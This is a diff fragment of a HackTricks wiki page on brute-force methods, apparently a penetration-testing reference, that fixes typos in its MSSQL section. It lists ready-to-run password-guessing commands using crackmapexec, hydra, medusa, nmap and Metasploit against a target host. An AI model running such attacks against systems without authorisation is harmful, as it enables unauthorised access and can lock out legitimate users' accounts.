HackTricks-wiki/hacktricks/generic-methodologies-and-resources/brute-force.md

 crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed.
-Be carefull with the number of password in the list, this could block accounts msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts.
+Be careful with the number of passwords in the list, this could block accounts msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts.
 If you have a domain set it and use USE_WINDOWS_ATHENT
 ```

 ### SSH